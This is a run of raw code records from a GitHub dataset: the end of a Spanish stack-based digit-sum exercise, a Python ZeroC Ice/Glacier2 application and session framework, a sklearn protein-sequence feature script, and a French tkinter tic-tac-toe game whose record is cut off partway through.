pila.push(aux.pop())\n\n\n# pila 1 = 8 5 6 9 9 6 2 5 \n# pila 2 = 7 5 4 2 6 6 5 2 \n# pila res = 1 6 1 1 2 6 7 7\n\npila1 = Stack()\npila2 = Stack()\n\npila1.push(8), pila1.push(5), pila1.push(6), pila1.push(9), pila1.push(9), pila1.push(6), pila1.push(2), pila1.push(5)\npila2.push(7), pila2.push(5), pila2.push(4), pila2.push(2), pila2.push(6), pila2.push(6), pila2.push(7), pila2.push(7)\n\n\ndef sumarDigitos(pila1, pila2):\n aux1 = pila1.clonar()\n aux2 = pila2.clonar()\n res = Stack()\n resto = 0\n while not aux1.estaVacia() and not aux2.estaVacia():\n suma = aux1.pop() + aux2.pop() + resto\n resto = suma // 10\n res.push(suma % 10)\n if resto:\n res.push(resto)\n invertirPila(res)\n return res\n\n\n\nprint(sumarDigitos(pila1,pila2))\n","repo_name":"adrianyaniri/estructuraDatos","sub_path":"ColasPilas/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41628752732","text":"import abc\nimport os\nimport signal\nimport threading\nimport traceback\n\nimport Glacier2\nimport Ice\n\n\nclass _ApplicationLoggerI(Ice.Logger):\n\n def __init__(self, py_logger):\n super(_ApplicationLoggerI, self).__init__()\n self._py_logger = py_logger\n\n def _print(self, message):\n self._py_logger.info(message)\n\n def trace(self, category, message):\n self._py_logger.info('{} : {}'.format(category, message) if category else message)\n\n def warning(self, message):\n self._py_logger.warning(message)\n\n def error(self, message):\n self._py_logger.error(message)\n\n\nclass Application(abc.ABC):\n\n def __init__(self, signal_policy=0):\n \"\"\"The constructor accepts an optional argument indicating whether to handle signals.\n\n :param signal_policy:\n Application.HandleSignals (the default) or\n Application.NoSignalHandling.\n \"\"\"\n Application._signalPolicy = signal_policy\n\n def main(self, args: list, config_file: str, init_data_list: list, logger):\n \"\"\"The main entry point for the Application class.\n\n :param args:\n The arguments are an argument list (such as sys.argv), 最高优先级\n :param config_file:\n The file path of an Ice configuration file,次优先级\n :param init_data_list:\n InitializationData properties 参数,最低优先级\n [('Ice.Default.Host', '127.0.0.1'), ('Ice.Warn.Connections', '1'), ... ]\n :param logger:\n python 的标准库 logger 对象\n :return:\n This method does not return until after the completion of the run method.\n The return value is an integer representing the exit status.\n \"\"\"\n if Application._communicator:\n Ice.getProcessLogger().error(args[0] + \": only one instance of the Application class can be used\")\n return 1\n\n Ice.setProcessLogger(_ApplicationLoggerI(logger))\n\n #\n # We parse the properties here to extract Ice.ProgramName.\n #\n init_data = self.generate_init_data(config_file, init_data_list, args)\n\n #\n # Install our handler for the signals we are interested in. We assume main() is called from the main thread.\n #\n if Application._signalPolicy == Application.HandleSignals:\n Application._ctrlCHandler = Ice.CtrlCHandler()\n\n try:\n Application._interrupted = False\n Application._app_name = \\\n init_data.properties.getPropertyWithDefault(\"Ice.ProgramName\", args[0])\n Application._application = self\n\n #\n # Used by _destroy_on_interrupt_callback and _shutdown_on_interrupt_callback.\n #\n Application._nohup = init_data.properties.getPropertyAsInt(\"Ice.Nohup\") > 0\n\n #\n # The default is to destroy when a signal is received.\n #\n if Application._signalPolicy == Application.HandleSignals:\n Application.destroy_on_interrupt()\n\n status = self.do_main(args, init_data)\n except Exception as e:\n Ice.getProcessLogger().error('main loop exception {}\\n{}'.format(e, traceback.format_exc()))\n status = 1\n\n #\n # Set _ctrlCHandler to 0 only once communicator.destroy() has completed.\n #\n if Application._signalPolicy == Application.HandleSignals:\n Application._ctrlCHandler.destroy()\n Application._ctrlCHandler = None\n\n return status\n\n @staticmethod\n def generate_init_data(config_file, init_data_list, args):\n init_data = Ice.InitializationData()\n init_data.properties = Ice.createProperties(None, None)\n for _property in init_data_list:\n assert isinstance(_property[0], str) and isinstance(_property[1], str)\n init_data.properties.setProperty(_property[0], _property[1])\n if config_file and os.path.isfile(config_file):\n init_data.properties = Ice.createProperties(None, init_data.properties)\n init_data.properties.load(config_file)\n if args:\n init_data.properties = Ice.createProperties(args, init_data.properties)\n return init_data\n\n def do_main(self, args, init_data):\n try:\n Application._communicator = Ice.initialize(args, init_data)\n Application._destroyed = False\n status = self.run(args)\n except Exception as e:\n Ice.getProcessLogger().error('{}\\n{}'.format(e, traceback.format_exc()))\n status = 1\n\n #\n # Don't want any new interrupt and at this point (post-run),\n # it would not make sense to release a held signal to run\n # shutdown or destroy.\n #\n if Application._signalPolicy == Application.HandleSignals:\n Application.ignore_interrupt()\n\n Application._condVar.acquire()\n while Application._callbackInProgress:\n Application._condVar.wait()\n if Application._destroyed:\n Application._communicator = None\n else:\n Application._destroyed = True\n #\n # And _communicator != 0, meaning will be destroyed\n # next, _destroyed = true also ensures that any\n # remaining callback won't do anything\n #\n Application._application = None\n Application._condVar.release()\n\n if Application._communicator:\n try:\n Application._communicator.destroy()\n except Exception as e:\n Ice.getProcessLogger().error(\n 'destroy _communicator exception {}\\n{}'.format(e, traceback.format_exc()))\n status = 1\n Application._communicator = None\n return status\n\n @abc.abstractmethod\n def run(self, args):\n \"\"\"This method must be overridden in a subclass.\n The base class supplies an argument list from which all Ice arguments have already been removed.\n The method returns an integer exit status (0 is success, non-zero is failure).\n \"\"\"\n raise RuntimeError('run() not implemented')\n\n def interrupt_callback(self, sig):\n \"\"\"Subclass hook to intercept an interrupt.\"\"\"\n pass\n\n def app_name(cls):\n \"\"\"Returns the application name (the first element of the argument list).\"\"\"\n return cls._app_name\n\n app_name = classmethod(app_name)\n\n def communicator(cls):\n \"\"\"Returns the communicator that was initialized for the application.\"\"\"\n return cls._communicator\n\n communicator = classmethod(communicator)\n\n def destroy_on_interrupt(cls):\n \"\"\"Configures the application to destroy its communicator when interrupted by a signal.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n cls._released = True\n cls._condVar.notify()\n cls._ctrlCHandler.setCallback(cls._destroy_on_interrupt_callback)\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n destroy_on_interrupt = classmethod(destroy_on_interrupt)\n\n def shutdown_on_interrupt(cls):\n \"\"\"Configures the application to shutdown its communicator when interrupted by a signal.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n cls._released = True\n cls._condVar.notify()\n cls._ctrlCHandler.setCallback(cls._shutdown_on_interrupt_callback)\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n shutdown_on_interrupt = classmethod(shutdown_on_interrupt)\n\n def ignore_interrupt(cls):\n \"\"\"Configures the application to ignore signals.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n cls._released = True\n cls._condVar.notify()\n cls._ctrlCHandler.setCallback(None)\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n ignore_interrupt = classmethod(ignore_interrupt)\n\n def callback_on_interrupt(cls):\n \"\"\"Configures the application to invoke interrupt_callback when interrupted by a signal.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n cls._released = True\n cls._condVar.notify()\n cls._ctrlCHandler.setCallback(cls._callback_on_interrupt_callback)\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n callback_on_interrupt = classmethod(callback_on_interrupt)\n\n def hold_interrupt(cls):\n \"\"\"Configures the application to queue an interrupt for later processing.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() != cls._hold_interrupt_callback:\n cls._previousCallback = cls._ctrlCHandler.getCallback()\n cls._released = False\n cls._ctrlCHandler.setCallback(cls._hold_interrupt_callback)\n # else, we were already holding signals\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n hold_interrupt = classmethod(hold_interrupt)\n\n def release_interrupt(cls):\n \"\"\"Instructs the application to process any queued interrupt.\"\"\"\n if Application._signalPolicy == Application.HandleSignals:\n cls._condVar.acquire()\n if cls._ctrlCHandler.getCallback() == cls._hold_interrupt_callback:\n #\n # Note that it's very possible no signal is held;\n # in this case the callback is just replaced and\n # setting _released to true and signalling _condVar\n # do no harm.\n #\n cls._released = True\n cls._ctrlCHandler.setCallback(cls._previousCallback)\n cls._condVar.notify()\n # Else nothing to release.\n cls._condVar.release()\n else:\n Ice.getProcessLogger().error(\"interrupt method called on Application configured to not handle interrupts.\")\n\n release_interrupt = classmethod(release_interrupt)\n\n def interrupted(cls):\n \"\"\"Returns True if the application was interrupted by a signal, or False otherwise.\"\"\"\n cls._condVar.acquire()\n result = cls._interrupted\n cls._condVar.release()\n return result\n\n interrupted = classmethod(interrupted)\n\n def _hold_interrupt_callback(cls, sig):\n cls._condVar.acquire()\n while not cls._released:\n cls._condVar.wait()\n if cls._destroyed:\n #\n # Being destroyed by main thread\n #\n cls._condVar.release()\n return\n callback = cls._ctrlCHandler.getCallback()\n cls._condVar.release()\n if callback:\n callback(sig)\n\n _hold_interrupt_callback = classmethod(_hold_interrupt_callback)\n\n def _destroy_on_interrupt_callback(cls, sig):\n cls._condVar.acquire()\n if cls._destroyed or cls._nohup and sig == signal.SIGHUP:\n #\n # Being destroyed by main thread, or nohup.\n #\n cls._condVar.release()\n return\n\n cls._callbackInProcess = True\n cls._interrupted = True\n cls._destroyed = True\n cls._condVar.release()\n\n try:\n cls._communicator.destroy()\n except Exception as e:\n Ice.getProcessLogger().error(\n \"{} (while destroying in response to signal {}): e: {}\\n{}\".format(\n cls._app_name, str(sig), e, traceback.format_exc()))\n\n cls._condVar.acquire()\n cls._callbackInProcess = False\n cls._condVar.notify()\n cls._condVar.release()\n\n _destroy_on_interrupt_callback = classmethod(_destroy_on_interrupt_callback)\n\n def _shutdown_on_interrupt_callback(cls, sig):\n cls._condVar.acquire()\n if cls._destroyed or cls._nohup and sig == signal.SIGHUP:\n #\n # Being destroyed by main thread, or nohup.\n #\n cls._condVar.release()\n return\n\n cls._callbackInProcess = True\n cls._interrupted = True\n cls._condVar.release()\n\n try:\n cls._communicator.shutdown()\n except Exception as e:\n Ice.getProcessLogger().error(\n \"{} (while shutting down in response to signal {}): e: {}\\n{}\".format(\n cls._app_name, str(sig), e, traceback.format_exc()))\n\n cls._condVar.acquire()\n cls._callbackInProcess = False\n cls._condVar.notify()\n cls._condVar.release()\n\n _shutdown_on_interrupt_callback = classmethod(_shutdown_on_interrupt_callback)\n\n def _callback_on_interrupt_callback(cls, sig):\n cls._condVar.acquire()\n if cls._destroyed:\n #\n # Being destroyed by main thread.\n #\n cls._condVar.release()\n return\n # For SIGHUP the user callback is always called. It can decide what to do.\n\n cls._callbackInProcess = True\n cls._interrupted = True\n cls._condVar.release()\n\n try:\n cls._application.interrupt_callback(sig)\n except Exception as e:\n Ice.getProcessLogger().error(\n \"{} (while interrupting in response to signal {}): e: {}\\n{}\".format(\n cls._app_name, str(sig), e, traceback.format_exc()))\n\n cls._condVar.acquire()\n cls._callbackInProcess = False\n cls._condVar.notify()\n cls._condVar.release()\n\n _callback_on_interrupt_callback = classmethod(_callback_on_interrupt_callback)\n\n HandleSignals = 0\n NoSignalHandling = 1\n\n _nohup = False\n\n _app_name = None\n _application = None\n _ctrlCHandler = None\n _previousCallback = None\n _interrupted = False\n _released = False\n _destroyed = False\n _callbackInProgress = False\n _condVar = threading.Condition()\n _signalPolicy = HandleSignals\n\n _communicator = None\n\n\nclass SessionNotExistException(Exception):\n def __init__(self):\n pass\n\n\nclass RestartSessionException(Exception):\n def __init__(self):\n pass\n\n\nclass SessionCancelException(Exception):\n def __init__(self):\n pass\n\n\nclass ConnectionCallbackI(Ice.ConnectionCallback):\n def __init__(self, app):\n self._app = app\n\n def heartbeat(self, conn):\n pass\n\n def closed(self, conn):\n Ice.getProcessLogger().warning('{} connect closed {}'.format(self._app.name, conn))\n self._app.connection_closed()\n\n\nclass GlacierSession(threading.Thread, abc.ABC):\n \"\"\"数据透传链路\"\"\"\n\n def __init__(self, name: str, config_file: str, init_data_list: list, logger):\n \"\"\"\n :param name:\n 实例and线程的名称\n :param config_file:\n The file path of an Ice configuration file,高优先级\n :param init_data_list:\n InitializationData properties 参数,低优先级\n [('Ice.Default.Host', '127.0.0.1'), ('Ice.Warn.Connections', '1'), ... ]\n :param logger:\n python 的标准库 logger 对象\n :var self.exception:\n 当线程退出后,可获取线程内部产生的异常\n 在网络连接断开后,内部进行自动重试,因此不会记录到网络通信组件的异常\n \"\"\"\n super(GlacierSession, self).__init__(name=name)\n self.config_file = config_file\n self.init_data_list = init_data_list\n self.logger = logger\n\n self.init_data_list.append((\"Ice.RetryIntervals\", \"-1\")) # 关闭ACM的重试功能\n\n self._communicator = None\n self._adapter = None\n self._router = None\n self._session = None\n self._is_session_created = False\n self._category = None\n\n self.exception = None\n\n self._quit = False\n self._quit_cond = threading.Condition()\n\n def __del__(self):\n if self.session_exist:\n Ice.getProcessLogger().error('{} not uninit !!!!'.format(self.name))\n self._do_uninit_internal()\n Ice.getProcessLogger().trace(None, '{} __del__'.format(self.name))\n\n def start(self):\n \"\"\"连接到透传网关\n\n :remark:\n 当首次连接失败时,抛出异常\n 当运行过程中链路断开后,会进行自动重连\n \"\"\"\n init_data = Application.generate_init_data(self.config_file, self.init_data_list, None)\n self._do_init_internal(init_data)\n Ice.getProcessLogger().trace(None, '{} init ok'.format(self.name))\n\n try:\n super(GlacierSession, self).start()\n except Exception as e:\n Ice.getProcessLogger().error('{} start failed {}\\n{}'.format(self.name, e, traceback.format_exc()))\n self._do_uninit_internal()\n raise\n\n def stop(self):\n \"\"\"停止连接\n\n :remark:\n 异步,不等待连接停止\n \"\"\"\n Ice.getProcessLogger().trace(None, '{} set quit flag'.format(self.name))\n self._quit_cond.acquire()\n self._quit = True\n self._quit_cond.notify_all()\n self._quit_cond.release()\n\n def stop_and_join(self):\n \"\"\"停止连接并等待连接停止\n\n :remark:\n 同步\n \"\"\"\n self.stop()\n if self.is_alive():\n self.join()\n\n @abc.abstractmethod\n def get_session_username_and_password(self) -> (str, str):\n \"\"\"获得连接到Glacier服务的username与password\"\"\"\n raise NotImplementedError()\n\n @abc.abstractmethod\n def run_with_session(self):\n \"\"\"主业务逻辑\n\n :remark:\n 已经连接到Glacier服务,可以调用所有成员函数\n 不可阻塞在该函数中\n 如果发生链路断开,该方法会被重复调用\n \"\"\"\n raise NotImplementedError()\n\n @abc.abstractmethod\n def post_run_with_session(self):\n \"\"\"主业务逻辑清理接口\n\n :remark:\n 当 run_with_session 中发生异常时,将会被调用\n 当 run_with_session 返回后发生异常,将会被调用\n \"\"\"\n raise NotImplementedError()\n\n @abc.abstractmethod\n def connection_closed(self):\n \"\"\"保留:通知链路断开\"\"\"\n raise NotImplementedError()\n\n @abc.abstractmethod\n def heartbeat_check(self):\n \"\"\"高层逻辑心跳\"\"\"\n raise NotImplementedError()\n\n @property\n def communicator(self):\n return self._communicator\n\n @property\n def session_exist(self) -> bool:\n \"\"\"判断session是否正常\n\n :remark:\n 仅仅检查标记,不进行数据报文探测\n \"\"\"\n return self._is_session_created and self._category is not None\n\n @property\n def router(self):\n assert self._router is not None\n return self._router\n\n @property\n def session(self):\n if not self.session_exist:\n raise SessionNotExistException()\n return self._session\n\n @property\n def category_for_client(self):\n if not self.session_exist:\n raise SessionNotExistException()\n return self._category\n\n def create_callback_identity(self, name):\n return Ice.Identity(name, self.category_for_client)\n\n def add_with_uuid(self, servant):\n return self.object_adapter.add(servant, self.create_callback_identity(Ice.generateUUID()))\n\n @property\n def object_adapter(self):\n if not self.session_exist:\n raise SessionNotExistException()\n if self._adapter is None:\n self._adapter = self._communicator.createObjectAdapterWithRouter(\"\", self._router)\n self._adapter.activate()\n return self._adapter\n\n @property\n def _run_continue(self) -> bool:\n \"\"\"线程是否继续循环工作\"\"\"\n if self._quit:\n raise SessionCancelException()\n return self.exception is None\n\n def run(self):\n try:\n while self._run_continue:\n if self.session_exist:\n self._run_with_session()\n else:\n self._create_new_session()\n except SessionCancelException:\n pass # do nothing\n finally:\n Ice.getProcessLogger().warning('{} exit'.format(self.name))\n\n def _set_exception(self, e):\n if isinstance(e, SessionCancelException):\n # 主动取消的优先级最高\n self.exception = e\n elif self.exception is None:\n self.exception = e\n else:\n # 仅记录最初始的异常\n Ice.getProcessLogger().trace(None, '{} ignore record {}'.format(self.name, e))\n\n def _create_new_session(self):\n init_data = Application.generate_init_data(self.config_file, self.init_data_list, None)\n try:\n self._do_init_internal(init_data)\n except RestartSessionException:\n self._do_uninit_internal()\n pass # do nothing\n except (Ice.ConnectionRefusedException, Ice.ConnectionLostException, Ice.UnknownLocalException,\n Ice.RequestFailedException, Ice.TimeoutException) as e:\n Ice.getProcessLogger().error('{} init net {}\\n{}'.format(self.name, e, traceback.format_exc()))\n self._do_uninit_internal()\n pass # do nothing\n except Exception as e:\n Ice.getProcessLogger().error('{} failed {}\\n{}'.format(self.name, e, traceback.format_exc()))\n self._set_exception(e)\n\n def _need_running(self) -> bool:\n self._quit_cond.acquire()\n self._quit_cond.wait(60) # wait 60s\n self._quit_cond.release()\n return not self._quit\n\n def _run_with_session(self):\n try:\n self.run_with_session()\n while self._need_running():\n self.heartbeat_check()\n raise SessionCancelException()\n\n # We want to restart on those exceptions which indicate a\n # break down in communications, but not those exceptions that\n # indicate a programming logic error (ie: marshal, protocol\n # failure, etc).\n except SessionCancelException as sce:\n Ice.getProcessLogger().warning('{} SessionCancelException'.format(self.name))\n self._set_exception(sce)\n except RestartSessionException:\n pass # do nothing\n except (Ice.ConnectionRefusedException, Ice.ConnectionLostException, Ice.UnknownLocalException,\n Ice.RequestFailedException, Ice.TimeoutException) as e:\n Ice.getProcessLogger().error('{} run net {}\\n{}'.format(self.name, e, traceback.format_exc()))\n pass # do nothing\n except Exception as e:\n Ice.getProcessLogger().error('{} failed {}\\n{}'.format(self.name, e, traceback.format_exc()))\n self._set_exception(e)\n finally:\n self._post_run_with_session()\n self._do_uninit_internal()\n\n def _post_run_with_session(self):\n try:\n self.post_run_with_session()\n except Exception as e:\n Ice.getProcessLogger().warning(\n '{} _post_run_with_session {}\\n{}'.format(self.name, e, traceback.format_exc()))\n\n def _do_init_internal(self, init_data):\n try:\n self._communicator = Ice.initialize(data=init_data)\n\n self._router = Glacier2.RouterPrx.uncheckedCast(\n self._communicator.getDefaultRouter())\n if self._router is None:\n raise Exception('no glacier2 router configured')\n\n try:\n username, password = self.get_session_username_and_password()\n self._session = self._router.createSession(username, password)\n self._is_session_created = True\n except Ice.LocalException as e:\n Ice.getProcessLogger().error('call create_session failed {}\\n{}'.format(e, traceback.format_exc()))\n raise\n\n if self._is_session_created:\n self._set_acm_setting()\n self._category = self._router.getCategoryForClient()\n except Exception as e:\n Ice.getProcessLogger().error('_do_init_internal failed : {}'.format(e))\n self._do_uninit_internal()\n raise\n\n def _set_acm_setting(self):\n acm_timeout = 0\n try:\n acm_timeout = self._router.getACMTimeout()\n except Ice.OperationNotExistException:\n pass\n if acm_timeout <= 0:\n acm_timeout = self._router.getSessionTimeout()\n if acm_timeout > 0:\n connection = self._router.ice_getCachedConnection()\n assert connection, '_do_init_internal ice_getCachedConnection failed'\n connection.setACM(acm_timeout, Ice.Unset, Ice.ACMHeartbeat.HeartbeatAlways)\n connection.setCallback(ConnectionCallbackI(self))\n\n def _do_uninit_internal(self):\n if self._router:\n if self._is_session_created:\n self._is_session_created = False\n try:\n self._router.destroySession()\n except (Ice.ConnectionLostException, SessionNotExistException):\n pass\n except Exception as e:\n Ice.getProcessLogger().error(\n 'unexpected exception when destroying the session {}\\n{}'.format(e, traceback.format_exc()))\n\n self._router = None\n\n if self._communicator:\n try:\n self._communicator.destroy()\n except Exception as e:\n Ice.getProcessLogger().error(\n 'unexpected exception when destroying the communicator {}\\n{}'.format(e, traceback.format_exc()))\n\n self._communicator = None\n\n self._adapter = None\n self._router = None\n self._session = None\n self._createdSession = False\n self._category = None\n","repo_name":"ShawnYi5/agent_application","sub_path":"common_utils/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":27005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30007460388","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer,TfidfVectorizer\n\nfrom sklearn.pipeline import FeatureUnion,Pipeline,make_union,make_pipeline\n\nfrom common import timer,read_csv,ItemSelector,TextStats\n\nwith timer(\"Load data\"):\n\tdf_protein_train = read_csv(\"df_protein_train.csv\")\n\tdf_protein_test = read_csv(\"df_protein_test.csv\")\n\ndf_protein = pd.concat([df_protein_train,df_protein_test])\ndf_protein.Sequence = df_protein.Sequence.apply(lambda x: x.upper())\n\nfeature_union = make_union(\n\tmake_pipeline(ItemSelector(key=\"Sequence\"),CountVectorizer(analyzer='char',ngram_range=(1,1))),\n\tmake_pipeline(ItemSelector(key=\"Sequence\"),TfidfVectorizer(analyzer='char',ngram_range=(1,1),use_idf=False)),\n\tmake_pipeline(ItemSelector(key=\"Sequence\"),TextStats(), DictVectorizer())\n\t)\n\nwith timer(\"Fit feature_union\"):\n\tfeat = feature_union.fit_transform(df_protein)\n\nout_col = [f'protein_stat_{i}' for i in range(feat.shape[1])]\noutput_file = \"./input/temp/df_protein_stat.csv\"\n\nwith timer(f\"Save file to {output_file}\"):\n\tdf_out = pd.DataFrame(feat.todense(),columns=out_col)\n\tdf_out['Protein_ID'] = df_protein.Protein_ID.values\n\tdf_out[['Protein_ID']+out_col].to_csv(output_file,index=False)","repo_name":"panjianning/DataCastle-Drug-Competition-1th-Place","sub_path":"make_protein_stat.py","file_name":"make_protein_stat.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"78"} +{"seq_id":"13404403921","text":"\"\"\"\r\n\r\nMorpion by Maxence.R\r\n\r\nDéveloppers and Designer\r\nInformaticiens indépendants\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n#\r\n#Importation des modules\r\n#\r\n\r\nimport time\r\nfrom tkinter import *\r\nfrom tkinter.messagebox import *\r\nimport pygame\r\nfrom random import *\r\n\r\ndef Clic(event):\r\n global a,C1,C2,C3,C1RC,C1R,C2RC,C2R,C3RC,C3R,L1RC,L1R,L2RC,L2R,L3RC,L3R,L1,L2,L3\r\n \r\n #\r\n # position du pointeur de la souris\r\n #\r\n \r\n X = event.x\r\n Y = event.y\r\n\r\n # \r\n #Si a=1 on met une croix\r\n #\r\n\r\n if a==1:\r\n if X < 100:\r\n if Y < 100:\r\n if C1[0]==2:\r\n a=0\r\n C1[0]=1\r\n L1[0]=1\r\n Croix(50,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if Y < 200:\r\n if C1[1]==2:\r\n a=0\r\n C1[1]=1\r\n L2[0]=1\r\n Croix(50,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if C1[2]==2:\r\n a=0\r\n C1[2]=1\r\n L3[0]=1\r\n Croix(50,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n if X < 200 and X > 100:\r\n if Y < 100:\r\n if C2[0]==3:\r\n a=0\r\n C2[0]=1\r\n L1[1]=1\r\n Croix(150,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if Y < 200:\r\n if C2[1]==3:\r\n a=0\r\n C2[1]=1\r\n L2[1]=1\r\n Croix(150,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if C2[2]==3:\r\n a=0\r\n C2[2]=1\r\n L3[1]=1\r\n Croix(150,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n if X < 300 and X > 200:\r\n if Y < 100:\r\n if C3[0]==4:\r\n a=0\r\n C3[0]=1\r\n L1[2]=1\r\n Croix(250,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if Y < 200:\r\n if C3[1]==4:\r\n a=0\r\n C3[1]=1\r\n L2[2]=1\r\n Croix(250,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if C3[2]==4:\r\n a=0\r\n C3[2]=1\r\n L3[2]=1\r\n Croix(250,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n # \r\n #Ici a=0 et on met un rond\r\n #\r\n\r\n else:\r\n if X < 100:\r\n if Y < 100:\r\n if C1[0]==2:\r\n a=1\r\n C1[0]=0\r\n L1[0]=0\r\n Rond(50,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if Y < 200:\r\n if C1[1]==2:\r\n a=1\r\n C1[1]=0\r\n L2[0]=0\r\n Rond(50,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if C1[2]==2:\r\n a=1\r\n C1[2]=0\r\n L3[0]=0\r\n Rond(50,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n if X < 200 and X > 100:\r\n if Y < 100:\r\n if C2[0]==3:\r\n a=1\r\n C2[0]=0\r\n L1[1]=0\r\n Rond(150,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if Y < 200:\r\n if C2[1]==3:\r\n a=1\r\n C2[1]=0\r\n L2[1]=0\r\n Rond(150,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if C2[2]==3:\r\n a=1\r\n C2[2]=0\r\n L3[1]=0\r\n Rond(150,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n if X < 300 and X > 200:\r\n if Y < 100:\r\n if C3[0]==4:\r\n a=1\r\n C3[0]=0\r\n L1[2]=0\r\n Rond(250,50)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n else :\r\n if Y < 200:\r\n if C3[1]==4:\r\n a=1\r\n C3[1]=0\r\n L2[2]=0\r\n Rond(250,150)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n \r\n else :\r\n if C3[2]==4:\r\n a=1\r\n C3[2]=0\r\n L3[2]=0\r\n Rond(250,250)\r\n else :\r\n showinfo(title='Non',message='Tu ne peux pas !')\r\n\r\n#\r\n#ici on créer la fonction pour afficher les ronds\r\n#\r\n\r\ndef Rond(x1,y1):\r\n global C1,C2,C3\r\n morpion.create_oval(x1-45,y1-45,x1+45,y1+45, fill=\"#FFFFFF\")\r\n Verif()\r\n\r\n#\r\n#ici on créer la fonction pour afficher les croix\r\n#\r\n\r\ndef Croix(x1,y1):\r\n global C1,C2,C3\r\n morpion.create_line(x1-45,y1-45,x1+45,y1+45, fill=\"#FFFFFF\")\r\n morpion.create_line(x1+45,y1-45,x1-45,y1+45, fill=\"#FFFFFF\")\r\n Verif()\r\n\r\ndef player_info():\r\n pseudo=pseudonyme.get()\r\n pseudo2=pseudonyme_two.get()\r\n \r\n print(\"Joueur 1 : \" + pseudo)\r\n print(\"Joueur 2 : \" + pseudo2)\r\n\r\nscore = 0\r\n\r\ndef replay_game_if_win():\r\n global score\r\n replay_game()\r\n score = 0\r\n #\r\n # Ici on remet les score a 0\r\n #\r\n\r\n ascore1 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore1.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore1.place(x=128, y=30)\r\n\r\n ascore2 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore2.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore2.place(x=250, y=30)\r\n\r\ndef add_point_score():\r\n global score\r\n global pseudonyme\r\n score +=25\r\n ascore1 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore1.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore1.place(x=128, y=30)\r\n if score >= 120:\r\n pseudo2=pseudonyme.get()\r\n showinfo(title='Gagne',message=f'{pseudo2} a Gagner !')\r\n time.sleep(2)\r\n replay_game_if_win()\r\n else:\r\n ascore1 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore1.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore1.place(x=128, y=30)\r\n\r\nscore2 = 0\r\n\r\ndef add_point_score2():\r\n global score2\r\n global pseudonyme_two\r\n score2 +=25\r\n ascore1 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore1.create_rectangle(0, 0, score, 45, fill='#595558', width=0)\r\n ascore1.place(x=128, y=30)\r\n if score2 >= 121:\r\n pseudo=pseudonyme_two.get()\r\n showinfo(title='Gagne',message=f'{pseudo} a Gagner !')\r\n time.sleep(2)\r\n replay_game_if_win()\r\n else:\r\n ascore2 = Canvas(root, width=120, height=30, bg='#443F42', highlightthickness=0)\r\n ascore2.create_rectangle(0, 0, score2, 45, fill='#595558', width=0)\r\n ascore2.place(x=250, y=30)\r\n\r\ndef replay_game():\r\n global morpion\r\n global 